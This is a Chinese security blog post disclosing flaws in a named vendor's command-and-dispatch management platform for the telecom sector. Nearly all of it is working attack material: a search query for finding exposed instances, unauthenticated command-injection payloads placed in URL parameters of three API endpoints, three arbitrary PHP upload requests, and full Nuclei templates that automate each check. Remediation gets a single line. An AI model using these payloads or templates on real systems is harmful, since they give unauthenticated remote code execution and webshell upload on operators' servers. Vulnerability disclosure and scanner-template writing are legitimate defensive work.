某指挥调度管理平台存在多处漏洞
2023-12-28 19:20:57 Author: Tokaye安全(查看原文) 阅读量:10 收藏

免责声明

由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!

一、简介

xxx指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。

二、漏洞描述

xxx指挥调度管理平台存在多处RCE、任意文件上传以及SQL注入等漏洞,未经身份认证的攻击者可通过上述等漏洞远程执行命令或写入后门等危害所导致服务器失陷。

三、复现环境

Query:body="指挥调度管理平台"

Demo1:invite_one_member接口RCE

Payload1:

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}

Poc1:

id: 福建科立讯通信有限公司指挥调度管理平台RCE

info:
 name: 福建科立讯通信有限公司指挥调度管理平台RCE
 author: xxx
 severity: high
 description: description
 reference:
   - https://
 metadata:
   query: body="指挥调度管理平台"    
 tags:

requests:
 - raw:
     - |+
       GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt` HTTP/1.1
       Host: {{Hostname}}

     - |
       GET /api/client/audiobroadcast/1.txt HTTP/1.1
       Host: {{Hostname}}
       
   matchers:
     - type: dsl
       dsl:
         - contains(body_2,"uid")      

Example:

Demo2:invite2videoconf接口RCE

Payload2:

GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
Host: {{Hostname}}

Poc2:

id: 2福建科立讯通信有限公司指挥调度管理平台RCE

info:
 name: 2福建科立讯通信有限公司指挥调度管理平台RCE
 author: xxx
 severity: high
 description: description
 reference:
   - https://
 metadata:
   query: body="指挥调度管理平台"    
 tags:

requests:
 - raw:
     - |+
       GET /api/client/invite2videoconf.php?callee=1&roomid=`id>1.txt` HTTP/1.1
       Host: {{Hostname}}

     - |
       GET /api/client/1.txt HTTP/1.1
       Host: {{Hostname}}
       
   matchers:
     - type: dsl
       dsl:
         - contains(body_2,"id")      

Example:

Demo3:invite_one_ptter接口RCE

Payload3:

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
Host: {{Hostname}}

Poc3:

id: 3福建科立讯通信有限公司指挥调度管理平台RCE

info:
 name: 3福建科立讯通信有限公司指挥调度管理平台RCE
 author: xxx
 severity: high
 description: description
 reference:
   - https://
 metadata:
   query: body="指挥调度管理平台"    
 tags:

requests:
 - raw:
     - |+
       GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`id>1.txt`&force=1&timeout=1 HTTP/1.1
       Host: {{Hostname}}

     - |
       GET /api/client/ptt/1.txt HTTP/1.1
       Host: {{Hostname}}
       
   matchers:
     - type: dsl
       dsl:
         - contains(body_2,"id")      

Example:

Demo4:upload接口任意上传

Payload4:

        POST /api/client/upload.php HTTP/1.1
       Host: {{Hostname}}
       Content-Length: 180
       Cache-Control: max-age=0
       Upgrade-Insecure-Requests: 1
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
       Accept-Encoding: gzip, deflate
       Accept-Language: zh-CN,zh;q=0.9
       Connection: close

       ------WebKitFormBoundarySwvD8hSn3Z0sHfMu
       Content-Disposition: form-data; name="ulfile";filename="1.php"
       Content-Type: image/png

       111
       ------WebKitFormBoundarySwvD8hSn3Z0sHfMu--

Poc4:

id: 指挥调度管理平台api/client-Upload

info:
 name: 指挥调度管理平台api/client-Upload
 author: xxx
 severity: info
 description: description
 reference:
   - http://
 tags: tags

requests:
 - raw:
     - |
       POST /api/client/upload.php HTTP/1.1
       Host: {{Hostname}}
       Content-Length: 180
       Cache-Control: max-age=0
       Upgrade-Insecure-Requests: 1
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
       Accept-Encoding: gzip, deflate
       Accept-Language: zh-CN,zh;q=0.9
       Connection: close

       ------WebKitFormBoundarySwvD8hSn3Z0sHfMu
       Content-Disposition: form-data; name="ulfile";filename="1.php"
       Content-Type: image/png

       111
       ------WebKitFormBoundarySwvD8hSn3Z0sHfMu--

     - |
       GET /upload/1.php HTTP/1.1
       Host: {{Hostname}}

   matchers-condition: and
   matchers:
     - type: word
       part: body
       words:
         - '111'
     - type: status
       status:
         - 200

Example:

Demo5:task-upload接口任意上传

Payload5:

        POST /api/client/task/uploadfile.php HTTP/1.1
       Host: {{Hostname}}
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Connection: close
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
       Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
       Content-Length: 374

       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uuid"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="number"

       122
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uploadfile";filename="1.php"
       Content-Type: image/jpg

       111
       ------WebKitFormBoundary25qW4eG1Jt50iyf7--

Poc5:

id: 指挥调度管理平台api/client/task/-Upload

info:
 name: 指挥调度管理平台api/client/task/-Upload
 author: xxx
 severity: info
 description: description
 reference:
   - http://
variables:
 tags: tags

requests:
 - raw:
     - |-
       POST /api/client/task/uploadfile.php HTTP/1.1
       Host: {{Hostname}}
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Connection: close
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
       Cookie: PHPSESSID=403fc14298f14704c52657fc5ff62c71
       Content-Length: 374

       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uuid"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="number"

       122
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uploadfile";filename="1.php"
       Content-Type: image/jpg

       111
       ------WebKitFormBoundary25qW4eG1Jt50iyf7--
     - |-
       GET /upload/task/{{timestrp}} HTTP/1.1
       Host: {{Hostname}}

   extractors:
     - type: regex
       name: timestrp
       internal: true
       part: body
       regex:
         - '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'        
       

   matchers-condition: and
   matchers:
     - type: word
       part: body
       words:
         - 111
     - type: status
       status:
         - 200

Example:

Demo6:event/uploadfile接口任意上传

Payload6:

        POST /api/client/event/uploadfile.php HTTP/1.1
       Host: {{Hostname}}
       Cache-Control: max-age=0
       Upgrade-Insecure-Requests: 1
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
       Accept-Encoding: gzip, deflate
       Accept-Language: zh-CN,zh;q=0.9
       Connection: close
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Length: 372

       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uuid"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="number"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uploadfile";filename="1.php"
       Content-Type: image/png

       111
       ------WebKitFormBoundary25qW4eG1Jt50iyf7--

Poc6:

id: 指挥调度管理平台api/client/event-Uplaod

info:
 name: 指挥调度管理平台api/client/event-Uplaod
 author: xxx
 severity: info
 description: description
 reference:
   - http://
variables:
 tags: tags

requests:
 - raw:
     - |-
       POST /api/client/event/uploadfile.php HTTP/1.1
       Host: {{Hostname}}
       Cache-Control: max-age=0
       Upgrade-Insecure-Requests: 1
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
       Accept-Encoding: gzip, deflate
       Accept-Language: zh-CN,zh;q=0.9
       Connection: close
       Content-Type: multipart/form-data; boundary=----WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Length: 372

       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uuid"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="number"

       1
       ------WebKitFormBoundary25qW4eG1Jt50iyf7
       Content-Disposition: form-data; name="uploadfile";filename="1.php"
       Content-Type: image/png

       111
       ------WebKitFormBoundary25qW4eG1Jt50iyf7--

     - |-
       GET /upload/event/{{timestrp}} HTTP/1.1
       Host: {{Hostname}}

   extractors:
     - type: regex
       name: timestrp
       internal: true
       part: body
       regex:
         - '[0-9a-zA-Z]{8}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{4}-[0-9a-zA-Z]{12}.php'        
       

   matchers-condition: and
   matchers:
     - type: word
       part: body
       words:
         - 111
     - type: status
       status:
         - 200

写在最后

交个朋友~

修复建议:

升级至安全版本~

长按二维码识别关注


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzODMwOTE5NQ==&mid=2247483785&idx=1&sn=60735e7a6a42428a833eb076e1560308&chksm=c37a3b8b63e4bb82bcdc98beb191423332ac548f0d4cedeee85edb30a118fb83719dd98c47a1&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh